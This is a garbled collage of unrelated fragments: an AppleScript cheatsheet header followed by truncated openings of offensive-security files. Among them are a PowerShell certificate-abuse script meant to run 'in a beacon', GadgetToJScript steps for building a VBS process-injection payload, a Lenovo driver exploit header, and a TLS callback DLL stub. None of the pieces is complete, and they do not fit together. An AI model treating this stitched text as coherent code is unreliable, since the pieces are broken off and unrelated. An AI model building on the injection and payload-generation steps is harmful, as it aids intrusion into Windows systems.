| title | updated | layout | category | prism_languages | intro |
|---|---|---|---|---|---|
| AppleScript | 2023-04-05 | 2017/sheet | macOS | | AppleScript is a scripting language for automating macOS. |
### Original script and research by commial
### https://github.com/commial/experiments/tree/master/windows-defender
### Set LUADec_Path to binary
### https://github.com/viruscamp/luadec
import struct
import argparse
import sys
import os
import io
import subprocess
#include <cstdio>
#include <windows.h>
VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
    puts("[DynamicLibrary.dll]: TLS Callback");
}
#ifdef _WIN64
#pragma comment (linker, "/INCLUDE:_tls_used")
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
#!/bin/zsh
echo "++ Stopping locationd"
sudo launchctl stop com.apple.locationd
echo "++ Dropping swiftliverpool"
echo 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
/// Using with GadgetToJScript (e.g. for VBS payload):
/// 1.) compile to DLL: c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:DInjectQueuerAPC.dll /r:System.Net.Http.dll DInjectQueuerAPC.cs
/// 2.) generate VBS: GadgetToJScript.exe -w vbs -b -o DInjectQueuerAPC -a DInjectQueuerAPC.dll
/// 3.) test: cscript.exe DInjectQueuerAPC.vbs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
#include <Windows.h>
#include <winternl.h>
#include <stdio.h>
#include <DbgHelp.h>
#include "LenovoMemoryMgr.h"
#pragma comment(lib, "dbghelp")
typedef NTSTATUS(WINAPI* pNtQueryVirtualMemory)(HANDLE, PVOID, DWORD, PVOID, SIZE_T, PSIZE_T);
iOS 16 introduced launch constraints, which can be used to constrain the launch of an application.
There are three types of constraints:
Self Constraints, which the launched application itself must meet
Parent Constraints, which the parent process must meet
Responsible Constraints, which the "responsible process" must meet (I assume that the responsible process is the process that asked launchd to launch a service)
Additionally, the TrustCache format was updated (see below) to support assigning each binary a "Constraint Category", which forces Self and Parent Constraints.
Note that Self, Parent and Responsible Constraints can also be set by the process performing the launch, and they can be included in the code signature in the new blob type 0xFADE8181. In both cases, the constraints are DER encoded (just like the DER entitlements).
Constraint Categories (from TrustCache, new in version 2):
import zlib
import io
import sys
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
def parse_png_chunk(stream):
    size = int.from_bytes(stream.read(4), "big")
    ctype = stream.read(4)
    body = stream.read(size)
function Get-ProcessPipes{
    param(
        [Parameter(Mandatory=$false)]
        [string]$CSV,
        [Parameter(Mandatory=$false)]
        [switch]$All
    )
    Add-Type -TypeDefinition @"
using System;